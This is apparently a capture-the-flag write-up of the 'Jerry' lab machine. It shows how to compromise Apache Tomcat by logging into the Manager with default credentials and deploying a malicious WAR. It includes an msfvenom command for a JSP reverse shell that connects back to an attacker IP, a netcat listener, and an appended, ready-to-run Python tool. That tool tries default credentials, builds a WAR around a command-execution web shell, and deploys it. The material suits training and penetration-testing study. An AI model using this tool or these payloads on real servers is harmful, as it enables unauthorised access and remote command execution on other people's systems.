# Jerry

## Nmap

```
sudo nmap 10.10.10.95 -p- -sS -sV  
 
PORT     STATE SERVICE VERSION
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 203.34 seconds
```

The default page served on port 8080 identifies the install as Apache Tomcat/7.0.88.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-f6d5c534a974b1b7d1f11631afe177513f316551%2Fimage.png?alt=media)

Clicking the 'Manager App' button prompts for HTTP Basic authentication before proceeding. A quick search for Tomcat default credentials returns the list below.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-e001d10a597a0332003d4fbae0ff8252341535d1%2Fimage.png?alt=media)

From the list above I tried `tomcat:s3cret` (the example manager user that ships commented out in Tomcat's default `tomcat-users.xml`) and was granted access as shown below. I have done penetration testing against Tomcat previously and know that once you have access to the Manager App you can deploy a malicious WAR file in order to gain a shell, since anything in a deployed WAR runs as the Tomcat service account.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-09b53fcf1b8351203363978c03ad12ac2a366cac%2Fimage.png?alt=media)

Using the command below we can create a WAR containing a JSP reverse shell with `msfvenom`. `LHOST`/`LPORT` must match the listener started later; port 80 is used here because outbound web traffic is rarely blocked.

```
msfvenom -p java/jsp_shell_reverse_tcp LHOST=10.10.14.29 LPORT=80 -f war > shell.war
```

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-0e02b43659dcd706a59811c402a282c0bfd0f643%2Fimage.png?alt=media)

Once uploaded via the 'WAR file to deploy' form, the shell appears as a new context under 'Applications' (here `/shell`, taken from the WAR filename).

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-ca9529b7e929ca5faf61190e2c6e3b005d19f2f1%2Fimage.png?alt=media)

Before triggering it, start a `netcat` listener on the attacking machine on the port given as `LPORT` (root is needed to bind port 80):

```
sudo nc -lvp 80
```

Then click the `/shell` path under 'Applications'. Browsing to the context path serves the JSP, which executes and connects back to the listener. As shown below, the resulting shell runs with the privileges of the Tomcat service, which on this host is `NT AUTHORITY\SYSTEM`, so there is no separate privilege escalation step.

![](https://1600278159-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F-MFlgUPYI8q83vG2IJpI%2Fuploads%2Fgit-blob-86447bf6db618a520c94ea05ef5b6b35e7e8afba%2Fimage.png?alt=media)
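The steps above (guess a default manager credential, build a WAR that runs a JSP when its context path is opened, deploy it through the Manager) can be scripted. The following is an added example and is not part of the original writeup or a tool the author used; the helper names, the credential list and the use of the Manager text interface at `/manager/text/deploy` are my own choices. The JSP is a plain command runner, used as a constructed stand-in for the `msfvenom` payload. Note that the text interface requires the `manager-script` role; an account that only has `manager-gui` (which is all the HTML console used above needs) is refused with HTTP 403 there, in which case the WAR still has to go through the HTML upload form.

```python
"""Added example: Tomcat Manager default-credential check + WAR build + deploy.
Names, credential list and the text-interface deploy are assumptions, not the
original author's method."""
import base64
import io
import urllib.error
import urllib.request
import zipfile

# Constructed stand-in for the msfvenom JSP: runs ?cmd=... and echoes stdout.
# It is NOT a reverse shell; it just shows what a WAR needs to carry.
CMD_JSP = r'''<%@ page import="java.io.*" %>
<%
  String c = request.getParameter("cmd");
  if (c != null) {
    Process p = Runtime.getRuntime().exec(c);
    BufferedReader r = new BufferedReader(new InputStreamReader(p.getInputStream()));
    String line;
    while ((line = r.readLine()) != null) { out.println(line); }
  }
%>'''

# Tomcat serves any .jsp inside a WAR on its own; web.xml is only used here to
# make the JSP the welcome file, so opening the bare context path (as clicking
# the app in the Manager does) triggers it without typing the file name.
WEB_XML = '''<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns="http://java.sun.com/xml/ns/javaee" version="3.0">
  <welcome-file-list><welcome-file>{jsp}</welcome-file></welcome-file-list>
</web-app>'''

# Well-known pairs from Tomcat's example tomcat-users.xml and default-cred lists.
DEFAULT_CREDS = [("tomcat", "tomcat"), ("tomcat", "s3cret"), ("admin", "admin"),
                 ("admin", ""), ("tomcat", "")]


def build_war(jsp_source: str, jsp_name: str = "index.jsp") -> bytes:
    """Return the bytes of a WAR (a zip) holding the JSP and a web.xml."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("WEB-INF/web.xml", WEB_XML.format(jsp=jsp_name))
        z.writestr(jsp_name, jsp_source)
    return buf.getvalue()


def war_entries(war: bytes) -> list:
    """List the entry names inside a WAR, for a sanity check before upload."""
    return zipfile.ZipFile(io.BytesIO(war)).namelist()


def basic_auth(user: str, password: str) -> str:
    token = base64.b64encode(f"{user}:{password}".encode()).decode()
    return f"Basic {token}"


def http_status(url, headers, method="GET", body=None) -> int:
    """Default transport: return the HTTP status code, including 4xx/5xx."""
    req = urllib.request.Request(url, data=body, headers=headers, method=method)
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as e:
        return e.code


def find_manager_creds(base_url, creds=DEFAULT_CREDS, transport=http_status):
    """First (user, password) that /manager/html accepts, or None.
    401 = bad credentials; 403 = valid account without the manager-gui role."""
    for user, pw in creds:
        status = transport(f"{base_url}/manager/html",
                           {"Authorization": basic_auth(user, pw)})
        if status == 200:
            return (user, pw)
    return None


def deploy_war(base_url, user, pw, war, path="/shell", transport=http_status) -> int:
    """PUT the WAR to the Manager text interface (needs manager-script)."""
    url = f"{base_url}/manager/text/deploy?path={path}&update=true"
    headers = {"Authorization": basic_auth(user, pw),
               "Content-Type": "application/octet-stream"}
    return transport(url, headers, method="PUT", body=war)


if __name__ == "__main__":
    target = "http://10.10.10.95:8080"  # the writeup's target
    found = find_manager_creds(target)
    print("manager credentials:", found)
    if found:
        war = build_war(CMD_JSP)
        print("WAR entries:", war_entries(war))
        print("deploy status:", deploy_war(target, *found, war))
```

The transport is injectable so the credential check and deploy can be exercised against a fake before pointing them at a live host. A 403 from `deploy_war` with credentials that `find_manager_creds` accepted is the `manager-gui`-only case described above, not a wrong password.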
